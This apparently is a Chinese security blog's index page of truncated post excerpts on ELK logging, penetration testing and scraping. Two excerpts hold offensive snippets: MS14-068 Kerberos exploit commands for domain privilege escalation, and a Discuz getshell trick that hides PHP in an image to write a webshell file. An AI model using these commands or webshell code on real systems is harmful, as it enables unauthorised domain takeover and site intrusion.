ELK stack收集nginx Log

为了简化所有的东西我都装在一台机器,其实其他的集群的话 1.设置静态ip ip a cd /etc/sysconfig/network-scripts/ vi ifcfg-ens160 BOOTPROTO=static PEERROUTES=yes IPADDR=192.168.1.138 GATEWAY=19...

业务安全测试的一些实例

近期做的一些业务安全方面的测试,其实毫无技术含量,就是想总结一下经常测试的点以及遇到的奇葩问题。 1.P2P常见逻辑漏洞(加车、下单、结算、支付等) 2.账号体系常见逻辑漏洞(注册、登录、撞...

域渗透那几个技巧

做个备份,最近用的比较多。 ms14068漏洞利用: 生成TGT: whoami /all python ms14068.py -u admin@xxx.com -p password -s sid -d dc.xxx.com ms14068.exe -u admin@xxx....

discuz后台拿shell姿势

昨晚遇到一个站点,好久不玩discuz都不会了。 做个笔记记录一下。 1.包含文件拿shell copy 1.jpg/b+1.txt/a 2.jpg 1.txt内容为: <?php fputs(fopen('f.php','w'),'<?p...

某一功能测试脚本

帮公司测试写的一个功能测试脚本。需要尽量少用第三方库,但其实还是用到了,连接ssh必须需要用到。 # coding:utf-8 import socket import sys import os import paramiko import subprocess...

记一次内网渗透

因为一客户的关系,需要搞定几个主站,收集一波信息下来,发现有waf,防火墙。略显棘手,找了一下子域,很偶然的机会挖到了一个任意文件上传,曲线救国路线开始,运气很好,在那几个主站在同一个网段。所以很顺...

kali linux安装nessus/openvas

前几天做渗透测试,需要用到这两个工具。做个备忘。 kali linux安装openvas apt-get update apt-get upgrade apt-get dist-upgrade apt-get install openvas #挂vpn下载,不然要等...

Scrapy抓取伯乐在线文章

前面我讲了一下scrapy基础,接下来就是实战搞一下 jobbole.py 我使用的py2,需要用到Request和Response对象爬取网站,使用callback进行函数回调,获取文章信息这里直接使用ItemLoader来填...